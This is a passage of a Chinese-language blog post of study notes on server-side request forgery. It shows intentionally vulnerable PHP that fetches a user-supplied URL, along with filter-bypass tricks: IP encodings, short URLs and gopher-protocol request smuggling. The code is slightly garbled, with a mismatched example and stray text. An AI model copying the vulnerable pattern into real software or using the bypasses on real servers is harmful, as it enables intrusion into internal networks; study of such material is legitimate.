<li>从url关键字中寻找：share、wap、url、link、src、source、target、u、3g、dispaly、sourceURI、ImageURL、domain……</li>
</ul>
<h3 id="•产生SSRF的PHP函数"><a href="#•产生SSRF的PHP函数" class="headerlink" title="•产生SSRF的PHP函数"></a>•产生SSRF的PHP函数</h3><ul>
<li>file_get_contents()</li>
<li>fsockopen()</li>
<li>curl_exec()</li>
</ul>
<h5 id="1-file-get-contents-函数造成的ssrf"><a href="#1-file-get-contents-函数造成的ssrf" class="headerlink" title="1.file_get_contents()函数造成的ssrf"></a>1.<strong>file_get_contents()函数造成的ssrf</strong></h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"> </span><br><span class="line">function curl($url)&#123;</span><br><span class="line">	$ch &#x3D; curl_init();&#x2F;&#x2F;初始化一个新的curl会话，返回一个curl句柄</span><br><span class="line">	curl_setopt($ch, CURLOPT_URL,$url);&#x2F;&#x2F;设置一个curl传输选项，需要获取的url地址</span><br><span class="line">	curl_setopt($ch, CURLOPT_HEADER,0);&#x2F;&#x2F;启动时候将头文件的信息作为数据流输出</span><br><span class="line">	curl_exec($ch);&#x2F;&#x2F;执行一个curl会话</span><br><span class="line">	curl_close($ch);</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">$url &#x3D; $_GET[&#39;url&#39;];</span><br><span class="line">curl($url);</span><br><span class="line"> </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>  file_get_contents：文件写入字符串，当url是内网文件的时候，会先去把这个文件的内容读出来再写入，导致了文件读取。</p>
<h5 id="2-fsockopen-函数造成的ssrf"><a href="#2-fsockopen-函数造成的ssrf" class="headerlink" title="2.fsockopen()函数造成的ssrf"></a>2.<strong>fsockopen()函数造成的ssrf</strong></h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"> </span><br><span class="line">function getfile($host,$port,$link)&#123;</span><br><span class="line">	$fp &#x3D; fsockopen($host,intval($port),$errno,$errstr,30);&#x2F;&#x2F;打开一个网络连接或者一个unix套接字连接</span><br><span class="line">	if(!$fp)&#123;</span><br><span class="line">		echo &quot;$errstr (error number $errno) \n&quot;;</span><br><span class="line">	&#125;else&#123;</span><br><span class="line"> </span><br><span class="line">		$out &#x3D; &quot;GET $link HTTP&#x2F;1.1\r\n&quot;;</span><br><span class="line">		$out.&#x3D;&quot;HOST $host \r\n&quot;;</span><br><span class="line">		$out.&#x3D;&quot;Connection:Close\r\n\r\n&quot;;</span><br><span class="line">		$out.&#x3D;&quot;\r\n&quot;;</span><br><span class="line">		fwrite($fp, $out);</span><br><span class="line">		$content &#x3D; &#39;&#39;;</span><br><span class="line">		while (!feof($fp)) &#123; &#x2F;&#x2F;检查是否已经达到文件末尾</span><br><span class="line">			$contents .&#x3D; fgets($fp,1024);</span><br><span class="line">			# code...</span><br><span class="line">		&#125;</span><br><span class="line">		fclose($fp)mianshiti </span><br><span class="line">		return $contents;</span><br><span class="line">	&#125;</span><br><span class="line"> </span><br><span class="line">&#125;</span><br><span class="line">echo(getfile(&quot;127.0.0.1&quot;,&quot;80&quot;,&quot;index.php&quot;));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h5 id="3-curl-exec-函数造成的ssrf漏洞"><a href="#3-curl-exec-函数造成的ssrf漏洞" class="headerlink" title="3.curl_exec()函数造成的ssrf漏洞"></a>3.<strong>curl_exec()函数造成的ssrf漏洞</strong></h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"> </span><br><span class="line">function curl($url)&#123;</span><br><span class="line">	$ch &#x3D; curl_init();&#x2F;&#x2F;初始化一个新的curl会话，返回一个curl句柄</span><br><span class="line">	curl_setopt($ch, CURLOPT_URL,$url);&#x2F;&#x2F;设置一个curl传输选项，需要获取的url地址</span><br><span class="line">	curl_setopt($ch, CURLOPT_HEADER,0);&#x2F;&#x2F;启动时候将头文件的信息作为数据流输出</span><br><span class="line">	curl_exec($ch);&#x2F;&#x2F;执行一个curl会话</span><br><span class="line">	curl_close($ch);</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">$url &#x3D; $_GET[&#39;url&#39;];</span><br><span class="line">curl($url);</span><br><span class="line"> </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h3 id="•绕过协议"><a href="#•绕过协议" class="headerlink" title="•绕过协议"></a>•绕过协议</h3><h5 id="1-ip地址转换绕过"><a href="#1-ip地址转换绕过" class="headerlink" title="1.ip地址转换绕过"></a>1.ip地址转换绕过</h5><p>192.168.0.1</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">(1)、8进制格式：0300.0250.0.1</span><br><span class="line">(2)、16进制格式：0xC0.0xA8.0.1</span><br><span class="line">(3)、10进制整数格式：3232235521</span><br><span class="line">(4)、16进制整数格式：0xC0A80001</span><br></pre></td></tr></table></figure>

<h5 id="2-短网址绕过"><a href="#2-短网址绕过" class="headerlink" title="2.短网址绕过"></a>2.短网址绕过</h5><p><img src="https://gitee.com/lin-ziyang/hexo/raw/master/image-20201120215420079.png"></p>
<p><img src="https://gitee.com/lin-ziyang/hexo/raw/master/image-20201120215444639.png"></p>
<p>​     即<a target="_blank" rel="noopener" href="http://www.baidu.com与http//x8r.cn/uhOYzn">www.baidu.com与http://x8r.cn/uhOYzn</a> 是一样的</p>
<h5 id="3-gopher协议"><a href="#3-gopher协议" class="headerlink" title="3.gopher协议"></a>3.gopher协议</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">格式：URL:gopher:&#x2F;&#x2F;&lt;host&gt;:&lt;port&gt;&#x2F;&lt;gopher-path&gt;_后接TCP数据流</span><br></pre></td></tr></table></figure>

<p>gopher协议支持发出GET、POST请求：可以先截获get请求包和post请求包，在构成符合gopher协议的请求。gopher协议是ssrf利用中最强大的协议</p>
<ul>
<li>gopher的默认端口是70</li>
<li>如果发起post请求，回车换行需要使用%0d%0a，如果多个参数，参数之间的&amp;也需要进行URL编码</li>
</ul>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://ggken753.github.io/2020/11/17/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B06/" data-id="ckhpm2jij0000ckv33ip89gql" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/11/19/%E6%B5%B7%E5%95%B8%E6%9D%AFwp/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          海啸杯wp
        
      </div>
    </a>
  
  
    <a href="/2020/11/15/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B05/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">SQL注入</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/11/">November 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/10/">October 2020</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/11/26/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B08/">(no title)</a>
          </li>
        
          <li>
            <a href="/2020/11/25/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B07/">MISC解题思路</a>
          </li>
        
          <li>
            <a href="/2020/11/19/%E6%B5%B7%E5%95%B8%E6%9D%AFwp/">海啸杯wp</a>
          </li>
        
          <li>
            <a href="/2020/11/17/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B06/">漏洞</a>
          </li>
        
          <li>
            <a href="/2020/11/15/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B05/">SQL注入</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>